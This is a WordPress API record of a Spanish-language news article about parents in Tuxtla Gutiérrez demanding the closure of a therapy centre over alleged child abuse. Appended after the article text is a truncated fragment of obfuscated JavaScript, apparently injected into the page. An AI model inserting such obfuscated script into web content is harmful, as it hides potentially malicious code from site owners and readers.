{"id":23335,"date":"2025-08-05T02:39:56","date_gmt":"2025-08-05T02:39:56","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23335"},"modified":"2025-08-05T02:39:57","modified_gmt":"2025-08-05T02:39:57","slug":"exigen-padres-el-cierre-de-da-psicointegral","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23335","title":{"rendered":"Exigen padres el cierre de DA Psicointegral"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000261039-1024x768.jpg\" alt=\"\" class=\"wp-image-23336\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000261039-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000261039-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000261039-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000261039-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000261039.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>Manuel Jim\u00e9nez.<br>4 de agosto del 2025. Tuxtla Guti\u00e9rrez.- Un grupo de padres de familia que denunciaron maltratos f\u00edsicos y psicol\u00f3gicos el jueves pasado en el centro DA Psicointegral de Tuxtla Guti\u00e9rrez se manifestaron este lunes para exigir el cierre definitivo de este lugar.<br>Dieron a conocer que que ya cuentan con un registro de atenci\u00f3n con n\u00famero: 0016 101 3901 2025 ante la Fiscal\u00eda General del Estado (FGE).<br>Sin embargo, se\u00f1alan la falta de avances en la investigaci\u00f3n y la ausencia de pronunciamientos claros por parte de las autoridades, a pesar de que el caso ha trascendido a nivel nacional.<br>Se\u00f1alaron que: \u201cEl centro, a cargo de la directora X\u00f3chitl, acumula m\u00e1s de 15 denuncias por maltrato infantil, pero sigue operando sin ser clausurado\u201d.<br>&#8220;No queremos que m\u00e1s ni\u00f1os pasen por lo que sufrieron nuestros hijos. Fueron violentados por las maestras psicoterapeutas\u201d.<br>Es por ello que exigen a la Fiscal\u00eda informe p\u00fablicamente sobre los avances del caso, pues aseguran que las autoridades han minimizado las acusaciones.<br>&#8220;No nos han entregado copias de las denuncias, solo este n\u00famero de registro, que es el mismo para todos&#8221;, denunci\u00f3 una madre.<br>Dieron a conocer que tras una reuni\u00f3n con el apoderado legal del centro el pasado jueves, se les devolvi\u00f3 el costo del curso entre 4 mil 500 y 4 mil 800.<br>\u201cNosotros no estamos buscando una compensaci\u00f3n econ\u00f3mica, sino justicia, queremos que las responsables paguen con c\u00e1rcel y que se les aplique todo el peso de la ley&#8221;, afirmaron.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez.4 de agosto del 2025. Tuxtla Guti\u00e9rrez.- Un grupo de padres de familia que denunciaron maltratos f\u00edsicos y psicol\u00f3gicos el jueves pasado en el centro DA Psicointegral de Tuxtla Guti\u00e9rrez se manifestaron este lunes para exigir el cierre definitivo de este lugar.Dieron a conocer que que ya cuentan con un registro de atenci\u00f3n con &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23336,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23335","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23335","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23335"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23335\/revisions"}],"predecessor-version":[{"id":23337,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23335\/revisions\/23337"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23336"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23335"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23335"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23335"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}